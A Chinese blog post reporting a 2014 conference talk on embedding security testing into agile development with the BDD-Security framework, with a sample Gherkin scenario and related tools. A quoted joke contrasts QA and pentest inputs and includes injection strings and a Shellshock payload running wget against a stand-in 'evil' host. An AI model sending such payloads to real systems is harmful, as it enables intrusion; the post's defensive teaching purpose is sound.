在开发流程中嵌入安全测试 -凯发k8网页登录

blog已经转移至github,大家请访问 http://qaseven.github.io/

在开发流程中嵌入安全测试

 continuumsecurity创始人stephen de vries,在velocity europe 2014大会上提出了持续且可视化的的观点。stephen表示,那些在开发过程中用于将qa嵌入整个开发流程的方法和工具都能同样的用于安全测试。bdd-security是一个基于jbehave,且遵循given-when-then方法的安全测试框架。
  传统的安全测试都遵循瀑布流程,也就是说安全团队总是在开发阶段的末期才参与进来,并且通常需要外部专家的帮助。在整个开发流程中,渗透测试总是被安排到很晚才做,使得为应用做安全防范的任务尤其困难且复杂。stephen认为安全测试完全可以变得像qa一样:每个人都对安全问题负责;安全问题可以在更接近代码的层面考虑;安全测试完全可以嵌入一个持续集成的开发过程中。
  为了论证qa和安全测试只有量的区别而没有质的区别,stephen展示了c. maartmann-moe和bill sempf分别发布的推特:
  从qa的角度:
  qa工程师走进一家酒吧,点了一杯啤酒;点了0杯啤酒;点了999999999杯啤酒;点了一只蜥蜴;点了-1杯啤酒;点了一个sfdeljknesv。
  从安全的角度:
  渗透测试工程师走进一家酒吧,点了一杯啤酒;点了”>杯啤酒;点了’or 1=1-杯啤酒;点了() { :; }; wget -o /beers http://evil; /杯啤酒。  要将安全测试集成进敏捷开发流程中,首先需要满足的条件是:可见性,以便采取及时应对措施并修补;可测试性,以便于自动化,比仅仅简单的扫描更有价值。stephen发现bdd工具族就同时满足了可见性及可测试性,因此他开始着手构建bdd-security安全测试框架。
  由于bdd-security是基于jbehave构建的,因此它使用bdd的标准说明语言gherkin。一个bdd-security测试场景如下:
  scenario: transmit authentication credentials over https
  meta: @id auth_https
  given the browser is configured to use an intercepting proxy
  and the proxy logs are cleared
  and the default user logs in with credentials from: users.table
  and the http request-response containing the default credentials is inspected
  then the protocol should be https
  bdd-security用户故事的编写与通常做法不太一样。bdd-security说明页面上写着:
  本框架的架构设计使得安全用例故事与应用的特定导航逻辑相互独立,这意味着同一个用户故事仅需要做微小的改动就能用在多个应用中,有时甚至无需修改。
  这也说明bdd-security框架认为对许多应用来说,有一系列安全需求都是普遍要满足的。也就是说你只需写代码把已有的故事插入你的应用——也就是导航逻辑中即可。当然,必要的时候你也完全可以编写自己的用户故事。
  bdd-security依赖于第三方安全测试工具来执行具体的安全相关的行为,例如应用扫描。这些工具有owasp zap或nessus等。
  stephen还提到其它一些有类似功能的工具。如zap-webdriver就是一款更简单的工具,不喜欢bdd方式的人可以考虑采用它。gauntlt与bdd-security框架类似,同样支持bdd,只是它使用的编程语言是。mittn用编写并且同样也使用gherkin。

posted on 2015-03-18 22:10 顺其自然evo 阅读(3170) 评论(0)  编辑  收藏 所属分类: 安全性测试


只有注册用户后才能发表评论。


网站导航:
              
 
2015年3月
22232425262728
1234567
891011121314
15161718192021
22232425262728
2930311234

导航

统计

常用链接

留言簿(55)

随笔分类

随笔档案

文章分类

文章档案

搜索

最新评论

阅读排行榜

评论排行榜

网站地图